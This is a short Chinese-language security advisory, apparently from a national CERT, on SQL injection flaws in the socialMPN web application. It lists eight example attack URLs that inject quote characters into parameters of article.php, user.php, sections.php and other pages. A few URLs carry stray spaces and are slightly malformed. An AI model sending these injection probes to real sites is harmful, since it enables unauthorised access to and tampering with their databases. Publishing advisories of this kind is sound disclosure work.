漏洞名稱: socialMPN Input Validation Holes Permit SQL Injection Attacks
漏洞編號: ICST-CA-2005-096
漏洞說明: socialMPN存在input validation error,遠端攻擊者可以利用惡意的參數對資料庫系統下達SQL指令
底下是URL入侵範例
http://[target]/article.php?sid=%27
http://[target]/use r.php?uname='&pass=1&op=login
http://[target]/viewforum.php?forum=43&siteid=%2527
http://[target]/newtopic.php?username='&password=
http://[target]/sections.php? op=listarticles&secid=%27
http://[target]/sections.php?op=listarticles&artid=%2527
http://[target]/index.php?siteid='&op=show&aftersid=380
http://[target]/friend .php?sid=%2527&yname=1&ymail=1&fname=1&fmail=1&op=SendStory
影響平台: Linux
Unix
Windows
影響狀況: 遠端攻擊者可以對資料庫下SQL指令,並變更安裝路徑
解決方案: 目前尚無確切解決方案,詳情請見
socialmpn.com... 參考資料: SecurityTracker.com